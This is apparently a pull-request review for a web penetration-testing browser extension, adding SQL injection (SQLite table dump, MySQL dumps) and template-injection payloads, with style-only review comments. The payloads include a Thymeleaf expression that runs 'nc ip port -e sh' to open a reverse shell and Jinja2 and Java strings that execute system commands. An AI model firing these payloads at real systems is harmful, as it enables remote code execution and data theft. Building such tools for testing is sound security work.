### PR TITLE
Update SQLi, SSTI and encoding function

### PR DESCRIPTION
**Pull request by lebr0nli**
- Update some SSTI cheat sheet (Jinja2, Thymeleaf...)
- Add a more convenient uridecode option (decode `+` to space)
- Update MySQL dump in one shot payload
- Support SQLite SQL injection

### CODE REVIEW

File: index.html [hunk 1]
```diff
@@ -164,11 +191,53 @@
...
+                      <v-list-item-title>Common Java Template RCE</v-list-item-title>
+                    </v-list-item>
+                    <v-list-item @click="applyFunction('Payload.SSTI.Java.thymeleafRCE', true)">
+                      <v-list-item-title>Thymeleaf RCE cheat sheet</v-list-item-title>
+                    </v-list-item>
+                  </v-list>
+                </v-menu>
               </v-list>
-            </v-menu>
+          </v-menu>
```
Comment (0140454) [inline index.html:240]: Are spaces removed accidentally?

File: scripts/lib/encode.js [hunk 2]
```diff
@@ -2,8 +2,8 @@ window.Encode = {}
 
 window.Encode.URL = {
   encode: value => encodeURIComponent(value),
-
-  decode: value => decodeURIComponent(value)
+  decode: value => decodeURIComponent(value),
+  decodePlus: value => decodeURIComponent(value.replaceAll('+',' '))
```
Comment (0140454) [inline scripts/lib/encode.js:6]: A style issue

Space is needed after comma.

File: scripts/lib/payload.js [hunk 3]
```diff
@@ -135,8 +181,18 @@ window.Payload.LFI = {
 }
 
 window.Payload.SSTI = {
-  flaskRCE: value => {
+  Jinja2:{
```
Comment (0140454) [inline scripts/lib/payload.js:184]: A style issue

Space is needed after colon.

File: index.html [hunk 4]
```diff
@@ -73,6 +73,12 @@
                     <v-list-item @click="sqlInjectionPrompt('Payload.SQLi.MySQL.dumpColumns')">
                       <v-list-item-title>Dump columns from database</v-list-item-title>
                     </v-list-item>
+                    <v-list-item @click="applyFunction('Payload.SQLi.MySQL.dumpCurrentQueries', true)">
+                      <v-list-item-title>Dump Current Qureis</v-list-item-title>
+                    </v-list-item>
+                    <v-list-item @click="applyFunction('Payload.SQLi.MySQL.dumpInOneShot', true)">
+                      <v-list-item-title>Dump in One Shot Payload</v-list-item-title>
```
Comment (0140454) [inline index.html:80]: A style issue

For consistence, I think two added title should be the following
- Dump current queries
- Dump in one shot payload

File: scripts/lib/payload.js [hunk 5]
```diff
@@ -123,6 +128,47 @@ window.Payload.SQLi = {
...
+      if (isNaN(columns) === true || isNaN(position) === true ||
+          position > columns) {
+        return ''
+      }
+
+      const fields = Array.from(Array(columns + 1).keys()).slice(1)
+      fields[position - 1] = 'group_concat(name)'
+
+      return 'union select ' + fields.join(',') +
+      " from sqlite_master WHERE type='table'"
```
Comment (0140454) [inline scripts/lib/payload.js:155]: A style issue

Two spaces are needed in the beginning.

File: scripts/lib/payload.js [hunk 6]
```diff
@@ -135,8 +181,18 @@ window.Payload.LFI = {
...
+    method2Global: value => "{{foo.__init__.__globals__}}",
+    flaskRCE: value => 
     // Reference: https://twitter.com/realgam3/status/1184747565415358469
-    return "{{ config.__class__.__init__.__globals__['os'].popen('ls').read() }}"
+    "{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}"
+    // todo : add features to bypass filter keywords like __ '' "" []
+  },
+  Java:{
+    thymeleafRCE: value => '__${T(java.lang.Runtime).getRuntime().exec("nc ip port -e sh")}__::.x',
+    commonRCE:value => "${T(java.lang.Runtime).getRuntime().exec('ls')}"
```
Comment (0140454) [inline scripts/lib/payload.js:196]: A style issue

Space is needed after colon.

**Review by 0140454 — CHANGES_REQUESTED** [review]
Good job.

In general, it looks good to me. However, there are some issues need to solve.

File: README.md [hunk 7]
```diff
@@ -38,7 +40,8 @@ Available on [Chrome Web Store](https://chrome.google.com/webstore/detail/hackba
   * PHP wrapper - Base64
 
 * SSTI
-  * Flask RCE ([Reference](https://twitter.com/realgam3/status/1184747565415358469))
```
[the remark this answers is not in the document]
Comment (lebr0nli) [reply README.md:41]: Sure.
I added it again know.

File: index.html (hunk 1 above)
Comment (lebr0nli) [reply index.html]: Fixed know.

File: scripts/lib/encode.js (hunk 2 above)
Comment (lebr0nli) [reply scripts/lib/encode.js]: Fixed now.

File: scripts/lib/payload.js (hunk 3 above)
Comment (lebr0nli) [reply scripts/lib/payload.js]: Fixed now.

File: index.html (hunk 4 above)
Comment (lebr0nli) [reply index.html]: Fixed now.

File: scripts/lib/payload.js (hunk 5 above)
Comment (lebr0nli) [reply scripts/lib/payload.js]: Fixed now.

File: scripts/lib/payload.js (hunk 6 above)
Comment (lebr0nli) [reply scripts/lib/payload.js]: Fixed now.

**Review by 0140454 — APPROVED** [review]

**Pull request merged**